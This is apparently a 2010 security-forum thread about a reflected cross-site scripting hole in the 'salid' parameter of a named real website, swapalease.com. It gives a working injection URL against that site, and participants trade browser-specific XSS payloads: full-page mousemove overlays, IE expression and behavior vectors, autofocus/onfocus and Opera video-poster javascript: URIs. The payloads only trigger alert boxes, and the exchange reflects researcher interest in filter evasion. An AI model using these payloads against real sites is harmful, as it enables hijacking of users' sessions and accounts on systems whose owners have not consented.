Noticed XSS on swapalease.com (e.g. http://swapalease.com/lease/details/2010BMWX5.aspx?salid=" onclick="alert(1);return false;"). Value of "salid" parameter is inserted into anchor's attribute, but quotes are not escaped, so it's possible to do something with "onclick" or "onmouseover". But now I'm curious if it's possible to break even more out of this kind of context. For example, execute code on page load, rather than on interaction with an anchor.

Server (ASP.NET?) seems to throw error on occurrence of anything that looks like a start tag (e.g. <img) in a query, so it's not possible to close anchor and start img, script, etc. (e.g. "><img src=1 onerror=...).

I was thinking of `style="background:url(javascript:...)"` but it doesn't work in FF3.6 (is it IE only or am I missing something?). I'm curious if anything else can be done in situations like this.

Thanks.

you could always use style sheets make it like 1000% height and width and maybe dynamically insert a script tag, maybe with some String.fromCharCode

just an idea, if that makes sense

http://www.xssed.com/archive/author=PaPPy/

Ah, of course... Thanks, I completely forgot about that :)

Now the only question is why does this alert in Opera (10.x), but not in WebKit (nightly) or FF (3.6)?

xttp://swapalease.com/lease/details/2010BMWX5.aspx?salid=" style="position:absolute;left:0;top:0;width:100%;height:100%;z-index:9999" onmousemove="alert(1);">

<=IE7 && IE8 + compat
"style="xss:expression(alert(1))"x="

In form elements (Safari,Opera,Chrome, FF+HTML5):-
<input autofocus onfocus=alert(1)>

In IE from mario:-
<a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1. IE from me (automatic execution and universal replacement "expression") UPD 2.05.2010: I must warn you that I did not know about this message http://sla.ckers.org/forum/read.php?12,33287,page=1#msg-33306 For this reason, I said "by me". I found this independently and published here :https://forum.antichat.ru/showpost.php?p=1149302&postcount=12 However, this vector is simple. LOL ))
UPD 19.10.2012: Kyo was first: http://sla.ckers.org/forum/read.php?2,4142

<a style=behavior:url(#default#time2) onbegin=alert(/lo/)>IE</a>

<input style=behavior:url(#default#time2) onbegin=alert(/lo/)>

or

<a style=behavior:url(#default#time2) end=0 onend=alert(/lo/)>IE</a>

2. Opera from me (creation of errors in style - a new way)

<a style=background:url() onerror=alert(/lo/)>Opera</a>

<input style=background:url() onerror=alert(/lo/)>

Quote

Opera one with onerror works with 10.10 and lower...

Now yes, unfortunately...




LeverOne



Edited 3 time(s). Last edit at 10/18/2012 10:29PM by LeverOne.

@LeverOne Nice Opera examples! Though they don't work in O10.5 anymore.

Opera 10.5 happiness:

<video/poster=javascript:alert(1)

<video/poster=java&#xascript:%61l&#x25;65rt(1)

Edited 1 time(s). Last edit at 03/03/2010 07:58AM by .mario.

@Gareth, @LeverOne

Thanks.

@LeverOne

FWIW, Opera one with onerror works with 10.10 and lower, but not in upcoming 10.50 (tested in beta on mac).